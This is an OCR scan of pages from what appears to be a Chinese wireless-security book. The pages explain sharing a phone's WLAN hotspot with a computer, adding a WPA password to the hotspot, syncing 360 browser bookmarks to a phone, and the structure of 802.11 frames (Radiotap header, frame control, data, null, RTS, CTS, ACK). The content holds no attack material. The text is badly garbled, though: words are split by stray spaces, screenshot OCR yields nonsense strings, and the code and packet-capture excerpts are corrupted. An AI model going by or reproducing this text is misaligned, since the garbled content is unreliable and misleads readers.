[step 轩 打开 手机 ， 进 入 手机 的 设置 界面 ， 
在 其 中 使 用 手指 点 按 “ 便 携 式 WLAN 热 
点 ” ， 开 启 手机 的 便携式 WLAN 热 点 功 
能 ， 如 下 图 所 示 。 


便携 式 WLAN 热点 


配置 WLAN 热点 
| c 更 


帮助 


Eee 图 返回 到 计算 机 的 操作 界面 ， 单 击 右 
下 角 的 无 线 连接 图 标 ， 在 打开 的 界面 中 显 
示 了 计算 机 自动 搜索 的 无 线 设备 和 信和 号 状 
态 ， 这 里 就 可 以 看 到 手机 的 无 线 设备 信息 
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“HUAWEIC8815”， 如 下 图 所 示 。 


[Eee 国 单 去 手机 无 线 设备 ， 即 可 打开 其 连接 


界面 ， 如 下 图 所 示 。 


质 TPUNKI 


又 Huawelcaal5 


连接 人 


step 国 单 去 “连接 ”按钮 ， 将 计算 机 通过 手 


机 设备 连接 网 络 ， 如 下 图 所 示 。 


抬 TPUNKI 


[seep 图 连接 成 功 后 ， 在 手机 设备 下 方 显示 
“已 连接 ， 开 放 ” 信 息 ， 其 中 的 “开放 ” 
表示 该 手机 设备 没有 进行 加 密 处 理 ， 如 下 
图 所 示 。 


本 EU 


质 TP-UNKGI 


侈 提示 : 至 此 ， 就 完成 了 计算 机 通过 手机 
上 网 的 操作 ， 这 里 需要 注意 的 是 一 定 要 时 
刻 关注 手机 的 上 网 流量 。 


5.4 实战 演练 


功能 
为 保证 手机 的 安全 ， 一 般 需 要 给 手机 


的 WLAN 热 点 功能 添加 密码 ， 具 体 的 操作 
步骤 如 下 。 

BEep 国 在 手机 的 移动 热点 设置 界面 中 ， 点 按 
“配置 WLAN 热 点 ”功能 ， 在 弹出 的 界面 
中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 设备 
的 加 密 方 式 ， 如 下 图 所 示 。 


HUAWEI C8815 


开放 


开放 


WPA PSK 


WPA2 PSK 


step 图 选择 好 加 密 方式 后 ， 即 可 在 下 方 显示 
密码 输入 框 ， 在 其 中 输入 密码 ， 然 后 单 击 
“保存 ”按钮 即 可 ， 如 下 图 所 示 。 


HUAWEI C8815 


WPA PSK 


step 图 加 密 完成 后 ， 使 用 计算 机 连接 手机 设 
备 时 ， 系 统 提示 用 户 输入 网 络 安 全 密 钥 ， 
如 下 图 所 示 。 
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人 后 HuawElc8815 


图 与 的 联系 人 共享 网 络 


下 一 步 


实战 演练 2 一 一 将 计算 机 收藏 夹 网 址 同步 
到 手机 

使 用 360 安 全 浏览 器 可 以 将 计算 机 收藏 
夹 中 的 网 址 同步 到 手机 当中 ， 其 中 360 安 全 
浏览 器 的 版 本 要 求 在 7.0 以 上 ， 上 有 具体 的 操作 
步骤 如 下 。 
[step 图 在 计算 机 中 打开 360 安 全 浏览 器 8.1， 
如 下 图 所 示 。 


step 图 单 击 工作 界面 左上 角 的 浏览 器 标志 ， 
在 弹出 的 界面 中 单 击 “ 登 录 账号 ”按钮 ， 
如 下 图 所 示 。 


step 图 弹出 “登录 360 账 号 ”对 话 框 ， 在 其 
中 输入 账号 与 密码 ， 如 下 图 所 示 。 
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pa 
© 


高 ~ 口 
DIO |Ds 
设 350 导 为 主 页 


己 后 口 


全 我 9 页 ， 国 


司 新 闻 . 视 果 登录 国 天 党 - 和 
各 史 机 , 江 潮 网 He 物 
村 划一 


全 请 关 全 


Q 1cox 


ET 


ED 


人 移 提 示 : 如 果 没 有 账号 ， 则 可 以 单 击 “ 免 
费 注册 ”按钮 ， 在 打开 的 界面 中 输入 账号 
与 密码 进行 注册 操作 。 


旬 关 360I 虽 


BE 有 7 了 3604k 号 


sw | 


二 毕 后 ， 单 击 “ 登 录 ” 按 钮 ， 
td 
中 ， 单 击 浏览 器 左上 角 的 图 标 ， 在 弹出 的 
下 拉 列 表 中 单 击 “ 手 动 同步 ”按钮 ， 如 下 
图 所 示 。 


mm 
跨 屏 浏览 和 的 帐号 
自 ”@ 
Ee APO 
i ee= 
E LL 下 汪 大 作 谍 视 民 让 ， 光 二 。 芝 也 百 启 和。 百 尼 = 去 
Fo 
1 回 最 fe 影 ”站 小 洲 戏 。 畏 小 党 全 
Fm | | ide ac0 枯 情 。 辆 二 -本 入 
TT -50 游戏 同上 购物 
人 Li ， 才 和 齐 半 ”本 


ET 
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[Bp 图 此 时 ， 可 将 计算 机 中 的 收藏 天 进行 同 
步 操作 ， 如 下 图 所 示 。 


zs 5 we Ia sn | -iO x 
人 @ ps /Moc 360.0n 如 v 日- 局 
| 本 关 避 Uinks 力 350 安 主 器 # 屋 
EE + 
计生 浊 帐 三 | = 
nN 

二 上 司 贡 

世 hb Oa Oe 

sx 


| 汤 闻 9 同 F 译 乐 前 才 吉 风 问 千 风 RM 机票 


省 By 

Rem We 
天 回 最 箔 电影 的 小 游戏 。 机 小 说 大 全 。 山 训 消 度 
© a 民 运 册 至 录 3,360 瑞城 新 酒 ,各 博 败 天 WE* 交 这 之 狐 * 视 各 
PT 0 阐 戏 淘宝 网 网 上 9 网 百 应 .加 
@ 活 因 -有 全 一 小 训 - 计 济 爱 角 主 频 划 而 同 闫 在 托 
办 澳 戏 .小 大 67 芭 关 -自用 凡 | | 国 半 本 太平 # 电 让 世系 
汽车 之 林 平 洋 汽车 实 昌 客 

让 全 网 当当 网 - 


i 进入 手机 操作 环境 当中 ， 点 按 “360 
Fry 图 标 ， 进 入 手机 360 浏 览 器 工 
作 界 面 ， 如 下 图 所 示 。 


办 be 


选择 城市 C 天 气 获取 失败 


新 浪 ”图 搜 锋 国 同 城 国 关 团 

国 好 药 四 本 度 国 京东 @ 允 车 

图 好 搜 淘宝 《图 乐 居 天 涯 

图 起 集 园 唯 会 ” 周 搜 房 网 携程 
最 常 访问 


图 360 个 人 中 心 - 找 回 


全 


step 回 点 按 页 面 下 方 的 “二 ”按钮 ， 打 开 
手机 360 浏 览 器 的 设置 界面 ， 如 下 图 所 示 。 
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收藏 夹 历史 
地 加 | 业 
设置 电脑 信息 下 载 退出 
三 病 个 [Se 图 在 登录 界面 输入 账号 与 密码 ， 这 里 需 


要 注意 的 是 ， 手 机 登录 的 账号 与 密码 与 计 
点 按 “收藏 天” 图标， 进入 手机 360 


算 机 登录 的 账号 与 密码 必须 一 致 ， 如 下 图 
浏览 器 的 “收藏 天 ”界面 ， 如 下 图 所 示 。 所 示 。 


2 Od .com 


编辑 同步 


[sep 回 单 去 “立即 登录 ”按钮 ， 即 可 以 会 
员 的 身份 登录 到 手机 360 浏 览 器 当中 ， 在 打 
ee 国 点 掖 “同步 ”按钮 ， 打 开 “ 账 号 登 ” 开 的 界面 中 可 以 看 到 “计算 机 收藏 天” 先 
录 ” 界面 ， 如 下 图 所 示 。 项 ， 如 下 图 所 示 。 
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国 电脑 收 训 夫 > 


编辑 


点 按 “ 计 算 机 收藏 夹 ” 选 项 ， 即 可 打 
开 “ 计 算 机 收藏 天 ”操作 界面 ， 在 其 中 可 
以 看 到 计算 机 中 的 收藏 夹 的 网 址 信息 出 现 
在 手机 浏览 器 的 收藏 夹 当 中 ， 这 就 说 明 收 
藏 天 网 址 同步 完成 ， 如 右 图 所 示 。 
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电脑 收藏 兴 T 


小 试 身手 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


组 建 一 个 简单 的 无 线 网 络 。 
将 手机 接 入 无 线 WiFi。 

手机 共享 计算 机 网 络 上 网 。 
计算 机 共享 手机 网 络 上 网 。 


第 6 童 ” 数 据 帧 的 结构 与 加 密 原 理 


无 线 通信 中 ， 所 有 的 数据 都 是 通过 无 线 设备 传送 数据 帧 完成 的 ， 所 以 学 习 无 线 数据 帧 的 
结构 以 及 无 线 通信 的 加 密 原 理 ， 是 提高 无 线 安全 的 基础 。 本 章 介绍 无 线 网 络 数据 帧 的 结构 与 
无 线 通信 的 加 密 原 理 ， 主 要 包括 数据 帧 、 控 制 帧 、 管 理 帧 的 结构 以 及 无 线 通信 的 加 密 原 理 。 


6.1 数据 帧 
6.1.1 ”数据 帧 的 结构 


无 线 数 据 帧 的 结构 比较 复杂 ， 包 含 
了 很 多 数据 信息 ， 其 中 Radiotap 头 与 IEEE 
802.11 协 议 头 是 数据 帧 中 的 头 信息 ， 下 面 进 
行 详细 介绍 。 


1. Radiotap 头 


Radiotap 头 是 802.11 帧 注入 和 接收 的 事 
实 标准 ， 所 以 在 研究 无 线 数据 帧 之 前 有 必 
要 了 解 一 下 Radiotap 头 。 

Radiotap 头 包含 了 信号 强度 、 噪 声 强 
度 、 信 道 、 时 间 戳 等 信息 。Radiotap 比 传 
统 的 Prism 或 AVS 头 更 有 灵活 性 ， 支 持 Ra- 
diotap 的 系统 较 多 ， 如 Linux、FreeBSD、 
NetBSD、OpenBSD， 还 有 Windows〔 需 使 
用 AirPcap) ， 厂 家 可 以 根据 自己 的 需要 定 
制 个 性 化 信息 ， 因 此 它 的 长 度 不 固定 。 

Radiotap 的 头 部 定义 如 下 : 


struct ieee80211_radiotap_header { 


u int8 七 it version; 

a 
ntSEE it pad; 
u intlé6é 七 it len; 

/* entire length */ 
u int32 t it present; 


/* fields present */ 
(( packed )); 


主要 参数 介绍 如 下 : 

(1) it version。 表 示 版 本 号 ， 值 始终 
为 0。 

(2) it_pad。 没 有 任何 使 用 价值 ， 仪 仅 
是 为 了 结构 体 对齐 。 


于 attribute 


(3) it len。 表 示 长 度 ， 包 括 了 Radio- 
tap 头 部 和 数据 两 部 分 ， 如 果 对 Radiotap 信 
息 不 关心 ， 通 过 该 长 度 计 算 可 以 直接 跳 到 右 
IEEE 802.11 头 部 。 

(4) it_ present。 表 示 Radiotap 数据 的 
位 掩 码 。Radiotap 的 数据 紧 跟 其 头 部 ， 当 其 
中 的 位 掩 码 为 tue 时 ， 表 示 有 对 应 的 数据 ， 
可 以 认为 每 一 比特 表示 一 种 类 型 。 比 如 bit5 
为 1 表示 有 通道 数据 ， 则 可 以 获取 到 信号 
强度 ， 反 之 是 没有 对 应 的 数据 。 因 此 ，Ra- 
diotap 的 长 度 其 实 是 不 固定 的 。 

Radiotap 头 通过 抓 包 软件 抓 出 来 的 信 
息 ， 如 下 图 所 示 。 


{ZT DIESJT 94 EYEeS EapEUredT272 DIE5J on InterYace 可 
h 24 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


其 中 ，Present flags 数 据 信息 中 的 Tsft 表 
示 数 据 掩 码 ， 当 Ext 标 记 为 1， 表 明 后 面 还 有 
一 个 flags 的 数据 ， 直 至 最 后 一 个 Present， 当 
Ext 标 记 为 0， 表 示 结 束 Present 的 数据 。 


2. IEEE 802.11 协 议 头 


无 线 网 络 由 于 自身 的 特性 ， 在 传输 过 
程 中 存在 被 窃听 的 缺陷 ， 因 此 学 习 IEEE 
802.11 协 议 头 的 组 成 便 是 整个 无 线 网 络 安全 
的 重 中 之 重 。 不 过 ， 在 学 习 IEEE 802.11 协 
议 头 之 前 需要 先 了 解 以 下 几 个 概念 : 
e DU (Data Unit) 数据 单元 : 信息 传 
输 的 最 小 数据 集合 。 

® MSDU (MAC Service Data Unit): 
MAC 服 务 数据 单元 。 

® MPDU (MAC Protocol Data Unit): 
MAC 协 议 数 据 单元 。 

e 传递 过 程 逐 层 封装 (Encapsulation ): 
数据 在 传输 过 程 中 的 封装 方式 ， 下 


1) Frame Control ( 帧 控制 域 ) 

Frame Control 〈 帧 控制 域 ) 包含 下 面 几 
个 部 分 : 

(1) Protocol Version (协议 版 本 占 2 
位 )。IEEE 802.11 协议 版 本 ， 多 数 情况 为 0。 

(2) Type〔〈 类 型 域 ) 和 Subtype( 子 类 
型 域 ) 共同 指出 帧 的 类 型 。 其 中 ，Type (2 
位 ) 规定 帧 的 具体 用 途 ， 包 括 三 种 类 型 ， 
管理 帧 取 值 为 0， 控 制 帧 取 值 为 1， 数 据 
帧 取 值 为 2。SubType (4 位 ) 为 子 类 型 ， 
根据 Type 的 不 同 对 应 多 个 子 类 型 ， 协 议 
规定 不 同类 型 、 子 类 型 的 帧 完成 不 同 功能 
的 操作 。 

(3) To DS (1 位 ) 。 表 明 该 帧 是 BSS 
向 DS 发 送 的 帧 。 

(4) FromDS (1 位，。 表 明 该 帧 是 DS 
向 BSS 发 送 的 帧 。 

To DS 、From DS 这 两 个 字段 的 值 决定 
MAC 头 中 的 四 个 地 址 字段 的 不 同 定义 ， 具 
体 如 下 图 所 示 。 


hkal iayer PDU (PFOU) > 


Address2 
DA SA BSSID 


Address3 | Address4 


+ MA tayer SOU NPOU) ] 


| AddreesFald | 全 MAC Layer SDU psou 


下 面 再 来 认识 一 下 802.11 的 数据 结构 ， 
下 图 为 其 数据 结构 。 


6 2 6 2304 4 


| 
ddmssa 用 sanss 避 © Barsssd Frame body 下 cs] 


EE 
B01T MAC Header MSDU Re 


MPDU2346 


11111111 

从 数据 结构 可 以 看 出 ，802.11 MAC 
Header (MAC 头 ) 包括 四 部 分 ， 分 别 是 
Frame Control〈 帧 控制 域 ) 、Dnuration/ID 
(持续 时 间 / 标 识 ) 、Address (地 址 域 》 和 


Sequence Control (序列 控制 域 》。 


smo | 
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0 
1 DA BsSID SA 
0 BssID SA DA 
1 RA TA DA SA 
RA: Recipient Address 

TA: Transmitter Address 


详细 介绍 如 下 : 

® BSSID (Basic Service Set Identifier) : 
基本 服务 集 标识 符 。 

® DA (Destination Address) : 
地 址 。 

e@ SA (Sender Address) : 源 地 址 。 

e@ RA (Receiver Address) : 接收 端 地 
址 。 

e@ TA (Transmission Address) : 发 送 
端 地 址 。 

® WDS (Wireless Distribution System) : 
无 线 分 布 式 系统 。 

四 个 字段 的 取 值 如 下 : 

e 0x00: 出 现在 IBSS 环 境 中 可 能 是 
管理 帧 或 者 是 控制 帧 类 型 ) ;或 者 
是 STSL (Station to Station Link) 中 


目的 


两 个 STA 间 的 通信 ， 这 种 情况 下 通 
信 不 经 过 AP。 

e 0x01: 表示 Data 帧 从 AP 端 发 向 
STA 端 。 

e 0x02: 表示 Data 帧 从 STA 端 发 向 
AP 端 。 

e 0x03: 表示 两 个 AP 间 的 通信 ， 
这 是 典型 的 WDS (Wireless 
Distribution System) 环境 下 AP 间 
的 通信 ， 或 者 表示 Mesh 环 境 下 MP 
间 的 通信 ; 只 有 此 时 才 会 使 用 到 
Address4 地 址 段 。 


人 注意: 只 有 单 播 接收 地 址 的 帧 才 会 被 分 
段 ， 广 播 帧 、 组 播 帧 不 适用 该 位 。 


(5) More Frag ( 占 1 位 ) 。 用 于 说 明 
长 帧 被 分 段 的 情况 ， 是 否 有 后 续 数据 ， 当 
取 值 为 1 时 表示 有 后 续 数 据 ， 可 能 是 数据 
帧 或 者 管理 帧 类 型 。 

(6) Retry ( 重 传 域 占 1 位 ) 。 是 否 重 传 ， 
取 值 为 1 表示 重 传 数据 ， 可 能 是 数据 帧 或 
管理 帧 类 型 ， 接 收 端 进程 使 用 此 位 判断 帧 
是 否 重复 。 

(7) Pwr Mgt (能量 管 理 域 占 1 位 〉。 
省 电 模 式 ， 取 值 为 1 时 表示 STA 处 于 省 电 
模式 ， 此 时 由 STA 向 AP 发 送 该 值 为 1 的 
帧 〈AP 不 使 用 该 字段 ) ， 省 电 模 式 下 STA 
不 接收 除 唤醒 帧 之 外 的 帧 数据 ， 发 送 给 它 
的 数据 帧 由 AP 进行 缓存 。 

(8) More Data (更 多 数据 域 占 1 位 ) 。 
如 果 是 值 为 1 表明 至 少 还 有 一 个 数据 帧 要 
发 送 给 STA。 当 AP 缓存 了 至 少 一 个 MSDU 
时 ， 会 向 省 电 模式 的 STA 发 送 该 位 为 1 的 
帧 ， 表 示 有 缓存 数据 需要 STA 进行 接收 ， 
接收 到 此 帧 的 STA 会 被 唤醒 并 向 AP 发 送 
PS-Poll 帧 ， 取 回 由 AP 代为 存放 的 数据 ; 
该 位 也 被 AP 用 于 有 更 多 的 广播 、 多 播 帧 需 
要 发 送 的 情况 。 

(9) Protected Frame ( 占 1 位 ) 。 可 能 
是 数据 帧 或 者 管理 帧 类 型 ， 表 示 MSDU 
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是 否 被 加 密 ， 也 用 于 表示 PSK 身份 验证 
Frame#3 帧 ;数据 载荷 位 为 空 时 ， 该 字段 取 
值 为 0。 

(10) Order (序号 域 占 1 位 ) : 在 非 
QoS 帧 的 情况 下 ， 取 值 为 1 表示 数据 必须 严 
格 按照 顺序 处 理 ， 通 常情 况 下 该 字段 为 0。 

2) DuratiomrID (持续 时 间 / 标 识 ) 

Duration/ID (持续 时 间 / 标 识 ) ， 表 
明 该 帧 和 它 的 确认 帧 将 会 占用 信道 多 长 时 
间 ; 对 于 帧 控制 域 子 类 型 为 Power Save-PoII 
的 帧 ， 该 域 表 示 了 STA 的 连接 身份 (AID， 
Association Indentification) 。 

3) Address (地址 域 》 

Address (地 址 域 ) 包括 源 地 址 

(SA) 、 目 的 地 址 (DA) 、 传 输 工 作 站 
地 址 CTA) 和 接收 工作 站 地 址 (RA) 。 
SA 与 DA 必 不 可 少 ， 后 两 地 址 只 针对 BSS 的 
通信 才 有 用 ， 而 目的 地 址 可 以 为 单 播 地 址 
(CUnicast address) 、 多 播 地 址 〈Multicast ad- 
dress) 、 广 播 地 址 (Broadcast address) 等 。 

4) Sequence Control (序列 控制 域 ) 

Sequence Control〈 序 列 控制 域 ) : 由 
代表 MSDU (MAC Server Data Unit) 或 者 
MMSDU (MAC Management Server Data 
Unit) 的 12 位 序列 号 〈Sequence Number) 
和 表示 MSDU 和 MMSDU 的 每 一 个 片段 的 编 
号 的 4 位 片段 号 组 成 (Fragment Number) 。 

5) 802.11 的 其 他 数据 结构 

802.11 的 数据 结构 还 存在 有 其 他 部 分 ， 
包括 Frame Body〈 帧 体 部 分 ) 和 FCS 〈 校 验 
码 ) ， 其 中 Frame Body〈 帧 体 部 分 ) ， 包 
含 信息 根据 帧 的 类 型 有 所 不 同 ， 主 要 封装 
的 是 上 层 的 数据 单元 ， 长 度 为 0~2312 个 字 
节 ， 可 以 推出 ，802.11 帧 最 大 长 度 为 2346 
个 字 节 。FCS 〈 校 验 码 ) 包含 32 位 完整 性 
校 验 码 。 

针对 帧 的 不 同 功能 ， 可 将 802.11 中 的 
MAC 帧 分 为 以 下 三 类 : 

e 数据 帧 : 用 于 在 竞争 期 和 非 竞争 期 

传输 数据 。 
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e 控制 帧 ， 用 于 竞争 期 间 的 握手 通信 
和 正 向 确认 ， 为 数据 帧 的 发 送 提供 
辅助 功能 。 

e 管理 帧 : 主要 用 于 STA 与 AP 之 间 协 
商 、 关 系 的 控制 ， 如 关联 、 认 证 、 
同步 等 。 


侈 提示 : Frame Control ( 帧 控制 ) 中 的 Type 

(类 型 ) 和 Subtype ( 子 类 型 ) 共同 指出 帧 
的 类 型 ， 当 Type 的 B3B2 位 为 00 时 ， 该 帧 为 
管理 帧 ;为 01 时 ， 该 帧 为 控制 帧 ;为 10 时 ， 
该 帧 为 数据 帧 。 而 Subtype 进 一 步 判 断 帧 类 
型 ， 如 管理 帧 又 分 为 关联 帧 和 认证 帧 。 


入 入 6.1.2 ”数据 帧 


数据 帧 会 将 上 层 协 议 的 数据 置 于 帧 主 
体 加 以 传递 ， 会 用 到 哪些 位 ， 取 决 于 该 数 
据 帧 所 属 的 类 型 ， 本 节 介 绍 两 种 类 型 的 数 
据 帧 ， 一 种 是 Data 数 据 帧 ， 另 一 种 是 Null 数 
据 帧 。 


1. Data 数 据 帧 


Data 数 据 帧 的 作用 在 于 携带 传输 数 
据 ， 它 的 Data 部 分 便 是 需要 传输 的 具体 数 
据 ， 至 于 传输 多 大 的 数据 ， 数 据 使 用 何 种 
方式 进行 加 密 它 并 不 关心 。 

Data 数 据 帧 在 实际 抓 包 软件 中 的 数据 
信息 ， 如 下 图 所 示 。 


= TEEE B92.11 Data Flags: .p....F. 
Type/Subtype: Data (0x6920) 
~ Frame Control Field: 9x9842 
86 = Version: © 
‘10.. = Type: Data frame (2) 
9600 .... = Subtype: © 
， Flags: Ox42 
.999 6000 6999 9969 = Duration: © microseconds 
Receiver address: Br 


Data: 668fage3bac621fab97531466885cb45cg9497c7cafee6aa.. 
[Length: 134] 


2. Null 数 据 帧 


Null 数 据 帧 由 MAC 标 头 与 FCS 结 尾 所 组 
成 。 当 工作 站 进入 休眠 状态 ， 接 入 点 必须 开 
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始 为 之 暂 存 数据 。 如 果 该 移动 式 工 作 站 没有 
数据 要 通过 分 布 式 系统 传输 ， 可 以 使 用 Null 
数据 帧 。Null 数 据 帧 的 用 法 ， 如 下 图 所 示 。 


Null frame: PM=1 


个 


Power 
management=1 


Null 数 据 帧 在 实际 抓 包 软件 中 的 数据 ， 
如 下 图 所 示 。 


~ IEEE 862.11 Null function (No data), Flags: EF 
Type/Subtype: Null function (No data) (ex6924) 
~ Frame Control Field: 9x4892 
.98 = Version: © 
7 18.. = Type: Data frane (2) 
6168 .... = Subtype: 4 
X82 


Transmitter address: 66: 
Destination addr 


Sey oun ase 
‘9991 6690 9161 .... 


= Sequence number oF 


6.2 ”控制 帧 


控制 帧 主要 用 于 协助 数据 帧 的 传递 ， 
控制 帧 通常 与 数据 帧 搭配 使 用 ， 可 用 于 管 
理 无 线 媒介 的 访问 、 提 供 MAC 层 的 可 靠 
性 ， 负 责 区 域 的 清空 、 信 道 的 取得 以 及 载 
波 监听 的 维护 等 ， 并 于 收 到 数据 时 予以 正 
面 的 应 答 ， 借 此 促进 工作 站 间 数 据 传 输 的 
可 靠 性 。 

控制 帧 中 的 Frame Control 位 ， 结 构 示意 
如 下 图 所 示 。 


bits 2 2 4 要 权 要 要 本 
T T TT 
Protocol | Type 
bd Sub Type oloeolelelelieleile@e 
@Tops 回 Power Management 
@ FromDS © More Data 
© More Fragments 加 Protected Frame 
@Retry ®@ Order 


控制 帧 中 的 Frame Control 位 ， 字 段 的 详 
细 说 明 如 下 : 


(1) Protocol (协议 版 本 ) 。 协 议 版 本 


的 值 为 0， 因为 这 是 目前 绝无仅有 的 版 本 。 

(2) Type《〈 类 型 ) 。 控 制 帧 的 类 型 识别 
码 为 01， 所 有 控制 帧 该 位 都 为 01 。 

(3) Subtype〈 次 类 型 ) 。 此 位 代表 发 
送 控制 帧 的 子 类 型 。 

(4) ToDS、FromDS。 控 制 帧 负责 处 理 
无 线 介 质 的 访问 ， 因 此 只 能 够 由 无 线 工 作 
站 产生 。 传 输 系统 并 不 会 收发 控制 帧 ， 因 
此 这 两 个 位 为 0。 

(5) More Fragments( 尚 有 片段 )。 控 
制 帧 不 可 能 被 切割 ， 因 此 该 位 为 0。 

(6) Retry〈 重 试 ) 。 控 制 帧 与 管理 或 
数据 帧 不 同 ， 无 须 在 序列 中 等 待 重 发 ， 因 
此 该 位 为 0。 

(7) Power Management (电源 管理 ) 。 
该 位 用 来 指示 、 完 成 当前 的 帧 交换 过 程 后 ， 
发 送 端的 电源 管理 状态 。 

(8) More Data( 尚 有 数据 )。More Data 
位 只 用 于 管理 数据 帧 ， 因 此 在 控制 帧 中 该 
位 为 0。 

(9) Protected Frame〈 受 保护 帧 ) 。 控 
制 帧 不 会 进行 加 密 ， 因 此 对 控制 帧 而 言 ， 
Protected Frame 位 为 0。 

(10) Order (次序) 。 控 制 帧 是 基于 
帧 交换 程序 (atomic frame exchange opera- 
tion) 的 构成 部 件 ， 因 此 必须 依 序 发 送 ， 所 
以 这 个 位 为 0。 

Subtype 与 帧 类 型 的 对 应 ， 其 中 Subtype 
字段 使 用 二 进 制 表示 ， 有 具体 介绍 如 下 。 

@ 1010: Power Save (PS) - Poll (省 

电 一 轮 询 ) 。 
e@ 1011: RTS〔 请 求 发 送 ， 即 : Request 
To Send， 预 约 信道 ， 帧 长 20 字 节 ) 。 
。 1100: CTS( 清 除 发 送 ， 即 : Clear To 
Send， 同 意 预 约 ， 帧 长 14 字 节 ) 。 

e 1101: ACK (确认 ) 。 

e 1110: CF-End (无 竞争 周期 结束 ) 。 

e 1111: CF-End (无 竞争 周期 结束 ) + 

CF-ACK (无 竞争 周期 确认 ) 。 
控制 帧 中 常用 的 四 种 类 型 如 下 : 


第 6 章 ”数据 帧 的 结构 与 加 密 原理 


(1) RTS 帧 。 用 来 取得 媒介 的 控制 权 ， 
用 于 传送 分 段 帧 ， 分 段 由 网 卡 驱 动 程序 中 
的 RTS threshold 阀 值 确定 。 

(2) CTS 帧 。 用 于 回复 RTS 帧 ， 如 果 
没有 RTS 当然 也 就 没有 CTS， 它 们 两 个 多 
数 是 成 对 出 现 的 。 

(3) ACK 帧 。MAC 及 任何 数据 的 传送 

(包括 一 般 传送 , RTS/CTS 交换 之 前 的 帧 、 
帧 片段 ) 都 需要 通过 ACK 帧 进行 确认 。 

(4) PS-POLL 帧 。 移 动 式 工 作 站 从 省 
电 模 式 苏醒 后 ， 会 向 AP 传送 一 个 PS-POLL 
帧 用 于 获得 缓存 数据 。 


6.2.1 RTS (请 求 发 送 ) 
告知 其 他 需要 传输 数据 的 客户 端 等 待 ， 避 
免 信 号 干扰 ， 其 中 数据 传输 的 大 小 划分 是 
由 网 卡 驱动 程式 中 的 RTS threshold 六 值 》 
来 定义 。 介 质 访问 权 只 针对 单 点 传播 《uni- 
cast) 帧 使 用 ， 对 于 广播 (broadcast) 与 组 
播 (multicast) 帧 不 受 影响 。 

下 图 为 RTS 帧 的 格式 。 


= MAC Hesder > 
站 


Duation Recetver Address 


DreDS 
DFromDs 
DMore Fragments 
Reoy 


RTS 的 MAC 标 头 由 四 个 位 构成 : 

(1) Frame Control ( 帧 控制 ) 。Frame 
Control 位 并 没有 任何 特殊 之 处 。 帧 的 sub- 
type〈 子 类 型 ) 位 设 定 为 1011， 代 表 RTS 
帧 。 除 此 之 外 ， 它 与 其 他 的 控制 帧 具备 相 


同位 。 (在 IEEE 802.11 协议 中 规定 ， 最 高 
有 效 位 乃 是 最 后 一 个 位 ， 因 此 在 subtype 位 
中 ， 第 7 个 位 代表 最 高 效 位 ) 

(2) Duration 〈 持 续 时 间 ) 。RTS 帧 会 
试图 预定 传输 介质 使 用 权 ， 供 帧 交换 程序 
使 用 ， 因 此 RTS 帧 发 送 者 必须 计算 RTS 帧 
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结束 后 还 需要 多 少时 间 。 
(3) Address 1 位 。Receiver Address ( 接 
收 端 地 址 ) ， 接 收 大 型 帧 的 工作 站 的 地 址 。 
(4) Address 2 位 。Transmitter Address 
(发 送 端 地 址 ) ，RTS 帧 的 发 送 端的 地 址 。 
下 图 为 使 用 抓 包 软件 抓 取 的 实际 RTS 数 


渴 6.2.2 CTS (允许 发 送 ) 


| CTS 帧 有 两 种 作用 ， 早 先 CTS 帧 仅 用 于 
由 应 答 RTS 帧 ， 如 果 没 有 RTS 出 现 ， 就 不 会 产 
幽 生 CTS， 后 来 CTS 帧 被 802.11g 防 护 机 制 用 来 
避免 干扰 较 旧 的 工作 站 。 

CTS 帧 的 格式 如 下 图 所 示 。 


MAC Header 
2 


Duration Receiver Address 


bits 2 扫 4 LR 
T T 


Type 


Woe ,| sbmpe-cs |oleleloeleleljole 


CTS 帧 的 MAC 标 头 由 三 个 位 构成 : 

(1) Frame Control ( 帧 控制 )。 帧 的 
subtype《〈 子 类 型 ) 位 被 设 定 为 1100， 代 表 
CTS 帧 。 

(2) Duration (持续 时 间 ) 。 用 于 应 
答 RTS 时 ，CTS 帧 的 发 送 端 会 以 RTS 帧 的 
Duration 值 作为 持续 时 间 的 计算 基准 。RTS 
会 为 整个 RTS-CTS-frame-ACK 交换 过 程 预 
留 介质 使 用 时 间 。 不 过 ， 当 CTS 帧 被 发 送 
出 后 ， 只 剩 下 其 他 末 帧 或 帧 片段 及 其 回应 待 
传 。CTS 帧 发 送 端 会 将 RTS 帧 的 Duration 值 
减 去 发 送 CTS 帧 及 其 后 短 帧 间隔 所 需 的 时 间 ， 
然后 将 计算 结果 置 于 CTS 的 Duration 位 。 


回 Power Management 
® More Data 

加 Protected Frame 
图 order 
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(3) Addressl 位 : Receiver Address 
(接收 端 地 址 ) 。CTS 帧 的 接收 端 即 为 之 
前 RTS 帧 的 发 送 端 ， 因 此 MAC 会 将 RTS 
帧 的 发 送 端 地 址 复制 到 CTS 帧 的 接收 端 地 
址 。802.11g 保护 操作 所 使 用 的 CTS 帧 会 被 
发 送 给 发 出 RTS 的 工作 站 ， 而 且 只 用 来 设 

定 NAV。 
下 图 为 使 用 抓 包 软件 抓 取 的 实际 CTS 数 


6.2.3 ACK (应 答 ) 


ACK (positive acknowledgment) 帧 是 
MAC 以 及 任何 数据 传输 都 需要 一 个 应 答 ， 
包括 一 般 传输 RTS/CTS 交 换 之 前 的 帧 、 帧 片 
段 ， 服 务 质 量 扩展 功能 放宽 了 个 别 数据 帧 
必须 各 自得 到 应 答 的 要 求 。 


下 图 为 ACK 帧 结构 。 
Ac Header 
bytd 2 a 6 4 
Frame |Duration| Receiver Address res 
bits 2 2 4 和 全 一 4 一 机 1 
Tr mr 
Type 二 
Protocol | YPe | sub Type=ack |ojelelelelelele 


© More Fragments 

ACK 帧 的 MAC 标 头 由 三 个 位 构成 ; 

(1) Frame Control ( 帧 控制 ) 。 帧 的 
subtype《〈 子 类 型 ) 位 被 设 定 为 1101， 代 表 
ACK 帧 。 

(2) Duration (持续 时 间 ) 。 根 据 ACK 
信号 在 整个 帧 交换 过 程 处 于 什么 位 置 ， 
Duration 的 值 可 以 有 两 种 设 定 方式 。 在 完整 
的 数据 帧 及 一 段 连续 帧 片段 的 最 后 一 个 片 
段 中 ，Duration 会 被 设 定 为 0。 数据 发 送 端 
会 将 Frame Control ( 帧 控制 ) 位 中 的 More 


® Power Management 
® More Data 

加 Protected Frame 
图 Order 


Fragments《〈 尚 有 片段 ) 位 设 定 为 0， 表 示 
数据 传输 已 经 结束 。 

如 果 More Fragments 位 为 0， 表 示 整 个 
传输 已 经 完成 ， 不 用 再 延长 对 无 线 信道 的 
